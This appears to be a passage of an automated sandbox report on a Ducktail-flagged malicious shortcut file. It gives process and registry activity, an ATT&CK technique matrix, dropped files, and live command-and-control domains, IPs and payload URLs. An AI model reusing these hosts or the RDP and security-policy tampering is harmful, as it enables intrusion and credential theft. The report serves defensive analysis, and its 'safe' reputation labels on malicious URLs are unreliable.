        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\Temp\svczHost.exeCode function: 20_2_00007FF70A2BBFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_00007FF70A2BBFE0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Modifies security policies related information
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin
        Source: powershell.exe, 00000002.00000002.2806222414.000001AC37A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
        Source: powershell.exe, 00000002.00000002.2806222414.000001AC37AB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2736324689.000001AC1D589000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2809986587.000001B438D18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3418771818.00000226FB8F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: powershell.exe, 0000000D.00000002.3418771818.00000226FB923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected Ducktail
        Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 9104, type: MEMORYSTR
        Source: Yara matchFile source: 00000002.00000002.2740483057.000001AC2023A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected Ducktail
        Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 9104, type: MEMORYSTR
        Source: Yara matchFile source: 00000002.00000002.2740483057.000001AC2023A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Allows multiple concurrent remote connection
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		OS Credential Dumping1
        System Time Discovery        		1
        Remote Desktop Protocol        		1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts12
        Command and Scripting Interpreter        		11
        Windows Service        		11
        Windows Service        		2
        Deobfuscate/Decode Files or Information        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution        		Logon Script (Windows)11
        Process Injection        		1
        Obfuscated Files or Information        		Security Account Manager115
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts5
        PowerShell        		Login HookLogin Hook1
        Software Packing        		NTDS441
        Security Software Discovery        		Distributed Component Object ModelInput Capture4
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets11
        Process Discovery        		SSHKeylogging15
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion        		Cached Domain Credentials251
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551865 Sample: U82W1yZAYQ.lnk Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 86 uyt1n8ded9fb380.com 2->86 90 Suricata IDS alerts for network traffic 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 Windows shortcut file (LNK) starts blacklisted processes 2->94 96 14 other signatures 2->96 10 cmd.exe 1 2->10         started        13 svczHost.exe 2->13         started        16 myRdpService.exe 2->16         started        19 sppsvc.exe 2->19         started        signatures3 process4 dnsIp5 120 Windows shortcut file (LNK) starts blacklisted processes 10->120 122 Suspicious powershell command line found 10->122 124 Encrypted powershell cmdline option found 10->124 136 2 other signatures 10->136 21 powershell.exe 14 49 10->21         started        26 conhost.exe 1 10->26         started        80 C:\Windows\Temp\myRdpService.exe, PE32+ 13->80 dropped 126 Multi AV Scanner detection for dropped file 13->126 28 powershell.exe 13->28         started        30 cmd.exe 13->30         started        32 cmd.exe 13->32         started        34 7 other processes 13->34 82 206.206.126.252, 49741, 49743, 8008 HYPEENT-SJUS United States 16->82 84 23.88.71.29, 49740, 49742, 8000 ENZUINC-US United States 16->84 128 Allows multiple concurrent remote connection 16->128 130 Modifies security policies related information 16->130 132 Reads the Security eventlog 16->132 134 Reads the System eventlog 16->134 file6 signatures7 process8 dnsIp9 88 uyt1n8ded9fb380.com 104.21.86.219, 443, 49714, 49715 CLOUDFLARENETUS United States 21->88 74 C:\Users\user\AppData\...\vz2enilj.cmdline, Unicode 21->74 dropped 108 Windows shortcut file (LNK) starts blacklisted processes 21->108 110 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 21->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->112 116 3 other signatures 21->116 36 cmd.exe 21->36         started        39 powershell.exe 5 27 21->39         started        41 csc.exe 3 21->41         started        44 conhost.exe 21->44         started        114 Loading BitLocker PowerShell Module 28->114 46 conhost.exe 28->46         started        48 net.exe 30->48         started        50 3 other processes 30->50 52 2 other processes 32->52 54 8 other processes 34->54 file10 signatures11 process12 file13 98 Windows shortcut file (LNK) starts blacklisted processes 36->98 100 Suspicious powershell command line found 36->100 102 Encrypted powershell cmdline option found 36->102 56 powershell.exe 36->56         started        60 conhost.exe 36->60         started        104 Potential dropper URLs found in powershell memory 39->104 106 Loading BitLocker PowerShell Module 39->106 62 WINWORD.EXE 69 50 39->62         started        64 conhost.exe 39->64         started        78 C:\Users\user\AppData\Local\...\vz2enilj.dll, PE32 41->78 dropped 66 cvtres.exe 1 41->66         started        68 net1.exe 48->68         started        signatures14 process15 file16 76 C:\Windows\Temp\svczHost.exe, PE32+ 56->76 dropped 118 Potential dropper URLs found in powershell memory 56->118 70 conhost.exe 56->70         started        72 WmiPrvSE.exe 56->72         started        signatures17 process18

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        U82W1yZAYQ.lnk16%ReversingLabsBinary.Trojan.Generic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\Temp\svczHost.exe16%ReversingLabsWin64.Malware.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/550%Avira URL Cloudsafe
        http://.css0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac552ec76819a08497356d4a4c1300c247665707c23d7ea2e5505405a37bf7431b8ca2fa35ffb67331141bd33177e82cf02229073ebb7c61d4ae688cf4c9aa3e80%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e29622915280%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
        http://html4/loose.dtd0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735a86345f43847747bb26eb66810%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec33750%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04d0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc20%Avira URL Cloudsafe
        http://schemas.openxmlf0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/4b9c61cb1e322589ff1c332a29228a9797ad1ca507caa63132cd31e860fea5dd020%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1091341c2988cbc2948325b3d5107ab6c121c54393a4d1151e59a1757a8ed15e97d729c9eb010734e1d9643144208f8d481d97ea13050ba135c180aa98783c1f89d259370e7f69ec234172a1fc1dd60bf0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb280%Avira URL Cloudsafe
        http://crl.:j0%Avira URL Cloudsafe
        http://206.206.126.252:8008/client/ws0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f8767910%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f20140%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://.jpg0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/StaticFile/RdpService/20%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
        https://go.micro0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac50%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735a0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04dd9da4d673c732c8da198bf177de048d268178a0b39d4d5ff3cc9ba1dea46b48fd52f3a309fb889c0f8b0d1fe17b088b9e4ad19e2c0ae1fc28a6029fc7cf0ec/Windows%20Defender/16/16/user/1970%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/StaticFile/RdpService/2h0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28b278eca426bd46417002fbcc64cded32eac1b1c9c1678c0981e7db20168094e80bda585ade9e496529eb1768f5a9ca258534cb9a9736b2e5428ee241bddef5ff3e3f58581d305b1fc9fef007d792310%Avira URL Cloudsafe
        http://www.microsoft.0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngXzo0%Avira URL Cloudsafe
        http://crl.microsof/crl/products/MicTimStaPCA_2010-07-01.crl0Z0%Avira URL Cloudsafe
        http://23.88.71.29:8000/client/ws0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de0%Avira URL Cloudsafe
        http://uyt1n8ded9fb380.com/api/check0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c90%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1090%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a50%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528d4a91f7de007736d3e869533e8ac791d776d249137edcf1b9b5f94cc9d5f29e8e79927784ba6e51196374f4288c79ddab7570b96946bdaadd59ccadec0a22e27ea0a0592f1b7a24bc844a7199b7ee80%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d330%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5c8263bf9f8f811f60dc996990%Avira URL Cloudsafe
        http://crl.microsof0%Avira URL Cloudsafe
        https://uyt1n8ded9fb380.com/KQ0%Avira URL Cloudsafe
        http://uyt1n8ded9fb380.com:443/x0%Avira URL Cloudsafe
        https://oneget.org0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uyt1n8ded9fb380.com
        		104.21.86.219
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/55true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735a86345f43847747bb26eb6681true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac552ec76819a08497356d4a4c1300c247665707c23d7ea2e5505405a37bf7431b8ca2fa35ffb67331141bd33177e82cf02229073ebb7c61d4ae688cf4c9aa3e8true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1091341c2988cbc2948325b3d5107ab6c121c54393a4d1151e59a1757a8ed15e97d729c9eb010734e1d9643144208f8d481d97ea13050ba135c180aa98783c1f89d259370e7f69ec234172a1fc1dd60bftrue
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f876791true
          • Avira URL Cloud: safe
          		unknown
          http://206.206.126.252:8008/client/wsfalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/StaticFile/RdpService/2true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04dd9da4d673c732c8da198bf177de048d268178a0b39d4d5ff3cc9ba1dea46b48fd52f3a309fb889c0f8b0d1fe17b088b9e4ad19e2c0ae1fc28a6029fc7cf0ec/Windows%20Defender/16/16/user/197true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28b278eca426bd46417002fbcc64cded32eac1b1c9c1678c0981e7db20168094e80bda585ade9e496529eb1768f5a9ca258534cb9a9736b2e5428ee241bddef5ff3e3f58581d305b1fc9fef007d79231true
          • Avira URL Cloud: safe
          		unknown
          http://23.88.71.29:8000/client/wsfalse
          • Avira URL Cloud: safe
          		unknown
          http://uyt1n8ded9fb380.com/api/checktrue
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528d4a91f7de007736d3e869533e8ac791d776d249137edcf1b9b5f94cc9d5f29e8e79927784ba6e51196374f4288c79ddab7570b96946bdaadd59ccadec0a22e27ea0a0592f1b7a24bc844a7199b7ee8true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5c8263bf9f8f811f60dc99699true
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/KQtrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://html4/loose.dtdpowershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.compowershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E3745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E4B2D000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04dpowershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/nativeaot-csvczHost.exe, myRdpService.exefalse
            		high
            https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://.csspowershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2powershell.exe, 0000000D.00000002.2971436736.00000226E33C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E35EC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/dotnet/runtimepowershell.exe, 0000000D.00000002.3347031829.00000226F3463000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3850480563.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519D648000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                    		high
                    https://aka.ms/dotnet-warnings/powershell.exe, 0000000D.00000002.3347031829.00000226F3463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000000.2951489622.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3850480563.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519D648000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpfalse
                      		high
                      https://uyt1n8ded9fb380.com/file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC1FF07000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.openxmlfpowershell.exe, 00000008.00000002.2661526576.0000026921AFD000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/nativeaot-compatibilitymyRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2800553876.000001AC2F8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A74C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2654660804.0000026919177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.00000203901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020381455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.0000020390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B014EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://uyt1n8ded9fb380.com/file2/4b9c61cb1e322589ff1c332a29228a9797ad1ca507caa63132cd31e860fea5dd02powershell.exe, 00000002.00000002.2740483057.000001AC211D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC1FF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC1FFB5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.:jpowershell.exe, 00000018.00000002.3303975051.00000203F5532000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/PesterXzopowershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
